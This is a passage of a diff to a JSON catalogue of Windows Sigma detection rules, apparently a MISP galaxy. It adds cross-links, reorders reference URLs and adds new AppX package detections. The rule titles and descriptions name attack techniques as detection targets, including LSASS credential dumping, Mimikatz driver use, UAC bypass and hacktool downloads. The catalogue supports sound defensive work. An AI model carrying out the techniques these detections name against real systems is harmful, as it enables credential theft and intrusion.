"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "53ba33fd-3a50-4468-a5ef-c583635cfa92", "value": "Chafer Activity - System" }, @@ -10107,6 +12717,15 @@ "attack.t1543" ] }, + "related": [ + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", "value": "KrbRelayUp Service Installation" }, @@ -10133,6 +12752,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "value": "Invoke-Obfuscation Via Use MSHTA - System" }, @@ -10159,6 +12787,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", "value": "Invoke-Obfuscation Via Use Clip - System" }, @@ -10185,6 +12822,15 @@ "attack.t1059.001" ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation CLIP+ Launcher - System" }, @@ -10209,6 +12855,15 @@ "attack.t1557.001" ] }, + "related": [ + { + "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "value": "Local Privilege Escalation Indicator TabTip" }, @@ -10233,6 +12888,15 @@ "attack.t1548" ] }, + "related": [ + { + "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", "value": "Vulnerable Netlogon Secure Channel Connection Allowed" }, @@ -10259,6 +12923,15 @@ "attack.s0029" ] }, + "related": [ + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", "value": "PsExec Service Installation" }, @@ -10355,6 +13028,15 @@ "attack.t1554" ] }, + "related": [ + { + "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b55d23e5-6821-44ff-8a6e-67218891e49f", "value": "HybridConnectionManager Service Running" }, @@ -10429,6 +13111,15 @@ "attack.t1071" ] }, + "related": [ + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3db10f25-2527-4b79-8d4b-471eb900ee29", "value": "GALLIUM Artefacts - Builtin" }, @@ -10445,8 +13136,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://twitter.com/mattifestation/status/899646620148539397", + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml" ], "tags": [ @@ -10455,6 +13146,15 @@ "attack.t1546.003" ] }, + "related": [ + { + "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", "value": "WMI Persistence" }, @@ -10471,9 +13171,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ @@ -10486,6 +13186,50 @@ "attack.t1059.007" ] }, + "related": [ + { + "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "cc3502b5-30cc-4473-ad48-42d51a6ef6d1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "401e5d00-b944-11ea-8f9a-00163ecd60ae", "value": "File Was Not Allowed To Run" }, @@ -10500,11 +13244,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", + "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -10514,9 +13258,154 @@ "attack.t1482" ] }, + "related": [ + { + "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "31d68132-4038-47c7-8f8e-635a39a7c174", "value": "Potential Active Directory Reconnaissance/Enumeration Via LDAP" }, + { + "description": "Detects an appx package installation with the error code \"0x80073cff\". Whihc indicates that the package didn't meet the sgining requirements and could be suspicious", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Legitimate AppX packages not signed by MS used part of an enterprise" + ], + "filename": "appxdeployment_server_susp_appx_package_installation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "898d5fc9-fbc3-43de-93ad-38e97237c344", + "value": "Suspicious AppX Package Installation Attempt" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in suspicious locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "appxdeployment_server_susp_package_locations.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "5cdeaf3d-1489-477c-95ab-c318559fc051", + "value": "Suspicious AppX Package Locations" + }, + { + "description": "Detects installation of known malicious appx packages", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Rare occasions where a malicious package uses the exact same name and version as a legtimate application" + ], + "filename": "appxdeployment_server_mal_appx_names.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "09d3b48b-be17-47f5-bf4e-94e7e75d09ce", + "value": "Malicious AppX Package Installed" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is downloaded from a suspicious domain", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "appxdeployment_server_susp_domains.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8b48ad89-10d8-4382-a546-50588c410f0d", + "value": "Suspicious Remote AppX Package Locations" + }, + { + "description": "Detects an appx package added the pipeline of the \"to be processed\" packages which is located in uncommon locations", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/11", + "falsepositive": [ + "Unknown" + ], + "filename": "appxdeployment_server_uncommon_package_locations.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "c977cb50-3dff-4a9f-b873-9290f56132f1", + "value": "Uncommon AppX Package Locations" + }, { "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "meta": { @@ -10562,6 +13451,15 @@ "attack.t1210" ] }, + "related": [ + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "value": "Possible Exploitation of Exchange RCE CVE-2021-42321" }, @@ -10610,6 +13508,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "value": "Failed MSExchange Transport Agent Installation" }, @@ -10634,6 +13541,15 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "550d3350-bb8a-4ff3-9533-2ba533f4a1c0", "value": "ProxyLogon MSExchange OabVirtualDirectory" }, @@ -10706,6 +13622,15 @@ "attack.t1505.002" ] }, + "related": [ + { + "dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6", "value": "MSExchange Transport Agent Installation - Builtin" }, @@ -10722,8 +13647,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ @@ -10731,6 +13656,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "value": "Exports Registry Key To an Alternate Data Stream" }, @@ -10747,8 +13681,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo.yml" ], "tags": [ @@ -10757,6 +13691,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "52182dfb-afb7-41db-b4bc-5336cb29b464", "value": "Suspicious File Download from File Sharing Domain" }, @@ -10773,8 +13716,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_domain_ext_combo_med.yml" ], "tags": [ @@ -10783,6 +13726,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", "value": "Unusual File Download from File Sharing Domain" }, @@ -10831,6 +13783,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "025bd229-fd1f-4fdb-97ab-20006e1a5368", "value": "Unusual File Download from Direct IP Address" }, @@ -10856,6 +13817,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "19b041f6-e583-40dc-b842-d6fa8011493f", "value": "Hacktool Download" }, @@ -10881,6 +13851,15 @@ "attack.t1564.004" ] }, + "related": [ + { + "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "value": "Executable in ADS" }, @@ -10897,7 +13876,7 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", + "https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" ], "tags": [ @@ -10905,6 +13884,15 @@ "attack.t1137.002" ] }, + "related": [ + { + "dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", "value": "Office Application Startup - Office Test" }, @@ -10971,9 +13959,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://www.dfirnotes.net/portproxy_detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ @@ -10983,6 +13971,15 @@ "attack.t1090" ] }, + "related": [ + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "value": "PortProxy Registry Key" }, @@ -11000,8 +13997,8 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", + "https://persistence-info.github.io/Data/recyclebin.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ @@ -11025,8 +14022,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://twitter.com/SBousseaden/status/1183745981189427200", + "https://blog.xpnsec.com/exploring-mimikatz-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ @@ -11035,6 +14032,15 @@ "attack.t1547.008" ] }, + "related": [ + { + "dest-uuid": "f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b3503044-60ce-4bf4-bbcb-e3db98788823", "value": "DLL Load via LSASS" }, @@ -11061,6 +14067,15 @@ "attack.t1546.002" ] }, + "related": [ + { + "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", "value": "Path To Screensaver Binary Modified" }, @@ -11077,9 +14092,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" ], "tags": [ @@ -11089,6 +14104,15 @@ "cve.2021.34527" ] }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", "value": "PrinterNightmare Mimimkatz Driver Name" }, @@ -11154,8 +14178,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" ], "tags": [ @@ -11163,6 +14187,15 @@ "attack.t1546.009" ] }, + "related": [ + { + "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "value": "New DLL Added to AppCertDlls Registry Key" }, @@ -11212,6 +14245,15 @@ "attack.t1136.001" ] }, + "related": [ + { + "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", "value": "Creation of a Local Hidden User Account by Registry" }, @@ -11237,6 +14279,15 @@ "attack.s0005" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", "value": "Windows Credential Editor Registry" }, @@ -11261,6 +14312,15 @@ "attack.t1547.005" ] }, + "related": [ + { + "dest-uuid": "5095a853-299c-4876-abd7-ac0050fb5462", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "value": "Security Support Provider (SSP) Added to LSA Configuration" }, @@ -11299,8 +14359,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -11334,6 +14394,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", "value": "UAC Bypass Via Wsreset" }, @@ -11375,8 +14444,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ @@ -11411,6 +14480,15 @@ "attack.t1546.010" ] }, + "related": [ + { + "dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", "value": "New DLL Added to AppInit_DLLs Registry Key" }, @@ -11486,6 +14564,15 @@ "car.2019-04-001" ] }, + "related": [ + { + "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", "value": "CMSTP Execution Registry Event" }, @@ -11502,8 +14589,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", + "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_trust_record_modification.yml" ], "tags": [ @@ -11527,8 +14614,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", + "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ @@ -11538,6 +14625,15 @@ "attack.t1547" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "value": "Atbroker Registry Change" }, @@ -11610,6 +14706,15 @@ "attack.t1608" ] }, + "related": [ + { + "dest-uuid": "84771bc3-f6a0-403e-b144-01af70e5fda0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "value": "HybridConnectionManager Service Installation - Registry" }, @@ -11634,6 +14739,15 @@ "attack.t1003.002" ] }, + "related": [ + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", "value": "Esentutl Volume Shadow Copy Service Keys" }, @@ -11650,10 +14764,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://github.com/hfiref0x/UACME", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", + "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -11663,6 +14777,15 @@ "attack.t1546.001" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", "value": "Shell Open Registry Keys Manipulation" }, @@ -11712,6 +14835,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", "value": "Potential Credential Dumping Via LSASS SilentProcessExit Technique" }, @@ -11736,6 +14868,15 @@ "attack.t1491.001" ] }, + "related": [ + { + "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "8b9606c9-28be-4a38-b146-0e313cc232c1", "value": "Potential Ransomware Activity Using LegalNotice Message" }, @@ -11767,6 +14908,22 @@ "attack.t1071.004" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + 